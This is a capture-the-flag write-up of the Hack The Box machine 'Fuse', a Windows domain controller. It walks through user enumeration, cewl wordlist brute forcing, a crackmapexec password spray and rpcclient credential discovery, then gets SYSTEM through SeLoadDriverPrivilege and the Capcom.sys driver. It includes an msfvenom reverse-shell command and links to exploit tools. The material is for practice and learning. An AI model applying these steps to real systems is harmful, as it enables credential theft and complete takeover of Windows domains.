# FUSE | 10.10.10.193

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial IP

### Ports and Services

![nmap](img/nmap.png)

This seems to be a domain controller as it has several ports open that indicate such. It is a Windows Server 2016.

#### 80 - HTTP - IIS 10.0

It appears to be a print logging webpage. The page leaks some interesting data, including potential usernames. I compiled them into a list.

![port 80](img/port-80.png)

I ran Kerbrute to enumerate the users and they all came back as valid.

#### 135 - RPC

Enumerating this port (and SMB) came up empty, with access denied messages. I would need valid credentials to enumerate.

With no other options (ie when the box creator gives you no other choice), I used cewl to create a wordlist from the words on the webpage, hoping that a password was somewhere in there. I don't know how realistic that is, but hey it's what we have ot do in order to move forward.

    cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist

With that wordlist I ran crackmapexec smb to see if there was a hit, and I did get one, with one caveat: it said the user must change the password to proceed.

![CrackMapExec](img/cme.png)

You can use smbpasswd to change the user's password, but I noticed that it resets quickly. Which is annoying and kind of CTF-like, but understandable as it would need to be reset so each user can discover the password themselves. But this makes things a little more complicated.

So I decided to quickly change the user's password and then use rpcclient to login as that gives a session.

    smbpass -r fuse.fabricorp.local bhult

Then right away I used the password I chose to create a session with rpcclient. From here I could enumerate.

`enumdomusers` gave me a list of users on the machine, which showed more than what I could grab from the webpage:

![enumdomusers](img/users.png)

I tried `querydispinfo` to see if there were any hints in the user descriptions, but there were none.

Since I knew of a printer, I could do `enumprinters`, and in that output was a credential:

![enumprinters](img/printer-creds.png)

## Exploitation

### Exploit Method

With that credential, i took the updated list of users and did a password-spray attack using crackmapexec, and I got two hits:

![CrackMapExec Password Spray](img/spray.png)

Both users had the same access via SMB, but it turns out one of them is allowed to PSRemote in, which I have to say is weird for a service account, but whatever:

![CME winrm pwn](img/cme-winrm.png)

So now I have a winrm shell on the box:

![Evil Winrm shell](img/shell.png)

## Privilege Escalation - svc-print > high-priv

### Further Enumeration

Sthompson was the only other user on the machine besides admin, but I didn't have access to their directory, obvi.

Unusual directories at the root, and a curious note:

![Enumeration](img/enum1.png)

There are a few other documents, one including a username and PIN, so I grabbed that, and another giving the new user bnielson's credentials, but upon trying that I got same message about having to change the password (which was the same as bhult), so not really worth pursuing unless I find their group membership to offer more permissions.

However, it is the user I currently have access as that will allow for privesc. We have the ability to load drivers, as seen in `whoami /privs`:

![whoami /priv](img/privs.png)

Annoyingly, this involves using Windows to compile some shit, which I am not a fan of, but I bet this will not work if I try to compile in Linux, so here goes nothing.

### Exploit method

Essentially, with the ability to load drivers, we can load a signed driver (so not a malicious one) that also happens to have a vuln that allows for the execution of code in kernel space. Happily, there is such a driver and it is called 'capcom.sys'. You can download it from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys).

The next thing to do is to compile all of the crap you need in Windows. So I grabbed the project that allows you to load the vulnerable driver from [here](https://github.com/TarlogicSecurity/EoPLoadDriver/) and then I grabbed the specific exploit you run against the vulnerable driver from [here](https://github.com/tandasat/ExploitCapcom).

I simply opened the EopLoadDriver.cpp file and then built it as a Release x64.

![EopLoadDriver.cpp](img/eop.png)

Then, for the Capcom exploit, I opened the sln file but had to modify one part of the code before building:

![modified code](img/mod.png)

Then I built it as normal, and transferred both of those exe's to my machine.

Next I created a payload using msfvenom, just your basic x64 reverse shell as an exe file.

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=6969 -f exe -o mnemonic.exe

Finally, I uploaded that payload, the capcom exploit exe, the EopLoadDriver exe, and the capcom driver itself to the victim machine. Yeah this has a lots of parts to it.

To perform this escalation, I first had to run the EopLoadDriver exe with some arguments. This gives the SeLoadDriverPrivilege (which isn't actually necessary in this case as we already have it), then loads the Capcom.sys driver into the appropriate registry:

![load the driver](img/load.png)

Next step is to run the actual capcom exploit, while having a listener waiting to catch the shell:

![running the exploit](img/exploit.png)

![root shell](img/root-shell.png)

## Conclusion

This one was certainly out of my league. I don't like boxes where I have to do things outside of my attacker machine, but I know compiling Windows binaries on Linux can fail most of the time, so even though it was a pain in the ass (my Windows VM was pretty out of date and unused), at least the executables it built worked fine.

The escalation was pretty complicated to me, though I am sure a pretty easy one overall for experienced folks.

**Steps taken:**

* Find user creds in printer website via brute force
* Change user password to get a stable RPC session
* In RPC session, enumerate printers to find more creds, use creds to get PSRemote session
* Abuse SeLoadDriverPrivilege to gain SYSTEM privileges
